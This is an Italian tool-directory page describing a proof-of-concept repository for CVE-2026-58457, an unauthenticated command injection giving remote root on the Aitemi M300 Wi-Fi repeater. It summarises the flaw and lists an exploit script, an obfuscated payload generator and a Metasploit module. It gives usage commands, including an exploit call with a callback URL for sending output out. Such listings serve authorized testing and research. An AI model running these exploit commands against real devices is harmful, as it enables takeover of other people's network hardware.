Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
Strumenti/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

Vedi Repository
21 mese faNon ancora revisionato

CVE-2026-58457 - Iniezione di comandi OS non autenticata nel ripetitore Wi-Fi Shenzhen Aitemi M300

[!WARNING] Questo codice è fornito COSÌ COM'È solo a scopo didattico e di ricerca. Non utilizzare questo PoC su sistemi di produzione, ambienti condivisi o target non autorizzati.

  • L'esecuzione o l'hosting di questo codice può attivare rilevamenti antivirus, avvisi di monitoraggio della sicurezza o conseguenze legali in caso di uso improprio.
  • Gli autori e i manutentori del repository declinano ogni responsabilità per danni, usi impropri o attività illegali derivanti da questo codice.
  • Da utilizzare esclusivamente in ambienti di laboratorio isolati con la dovuta autorizzazione. Destinato esclusivamente alla ricerca difensiva, all'analisi delle vulnerabilità e ai test blue-team.

Riepilogo della vulnerabilità

Esiste una vulnerabilità di iniezione di comandi del sistema operativo non autenticata nel gestore smacfilter_conf. I parametri GET name, enable e mac vengono passati senza sanificazione a una chiamata sprintf() che costruisce comandi UCI eseguiti come root.

  • Gravità: Critica (CVSS 9.8)
  • Impatto: Esecuzione remota di comandi come root senza autenticazione

Strumenti inclusi

  • poc.py - Exploit completo con supporto HTTPS, tentativi ripetuti, timeout ed esfiltrazione tramite callback.
  • val.py - Validatore di vulnerabilità sicuro e passivo (usa il comando innocuo id).
  • gen.py - Generatore di payload avanzato con molteplici tecniche di offuscamento.
  • MITIGATIONS.md - Misure difensive raccomandate.
  • Modulo Metasploit - Disponibile nella directory exploit/.

Installazione

root@kitploit:~
pip install requests

Utilizzo rapido

  1. Valida (Sicuro)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. Exploit (Solo test autorizzati)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Genera payload offuscati
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. Sposta il modulo
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Ricarica tutto
root@kitploit:~
msfconsole -q -x "reload_all"

Riferimenti

  • CVE-2026-58457
  • Avviso VulnCheck
  • Divulgazione GitHub

Stelle e contributi sono benvenuti - in particolare miglioramenti per bypass o varianti firmware aggiuntive.

Scarica lo strumento